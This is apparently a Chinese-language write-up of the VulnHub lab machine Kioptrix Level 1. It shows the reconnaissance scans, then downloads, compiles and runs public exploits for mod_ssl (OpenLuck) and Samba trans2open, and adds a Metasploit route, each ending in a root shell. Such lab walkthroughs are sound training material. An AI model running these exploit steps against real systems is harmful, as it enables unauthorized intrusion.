Kioptrix: Level 1 (#1)

Kioptrix: Level 1 (#1)    https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Flag:Email

ifconfig
nmap -sn 192.168.0/24

本機IP：192.168.1.114   靶機IP：192.168.1.104

看一下開了哪些端口和服務

nmap 192.168.1.104 -O -sS -sV -v
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:46:21:38 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.013 days (since Mon May 11 22:17:03 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros

看下有哪些路徑，並沒有發現可利用的

dirb http://192.168.1.104/

掃描下有哪些漏洞

nikto -h 192.168.1.104

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

---

在https://www.exploit-db.com/中查詢到了POC： https://www.exploit-db.com/exploits/47080

wget -O 47080.c https://www.exploit-db.com/download/47080

編譯前准備

apt-get install libssl-dev

編譯

gcc -o exp 47080.c -lcrypto

運行發現要找對應版本，Red-Hat/Linux  Apache/1.3.20

./exp
./exp | grep apache-1.3.20

符合的有兩個0x6a、0x6b，實測0x6a不能用，0x6b可以

./exp 0x6a 192.168.1.104 -c 40

連上之后已經是root權限了

whoami
cat /etc/*-release
uname -a
mail
1
exit

Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

---

方法二

在139端口運行着Samba，nmap沒有給出版本號，用msfconsole模塊查詢

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.1.104
set threads 50
run

得到版本號為：Samba 2.2.1a

登錄smb看下有哪些服務

smbclient -L 192.168.1.104 -N

 在https://www.exploit-db.com/查詢 發現  Samba < 2.2.8 (Linux/BSD) - Remote Code Execution 符合

下載--編譯--運行

wget -O t.c https://www.exploit-db.com/download/10
gcc -o tt t.c
./tt -b 0 192.168.1.104
whoami

---

也可以借助msfconsole 

msfconsole
search samba
use exploit/linux/samba/trans2open
options
set rhost 192.168.1.104
run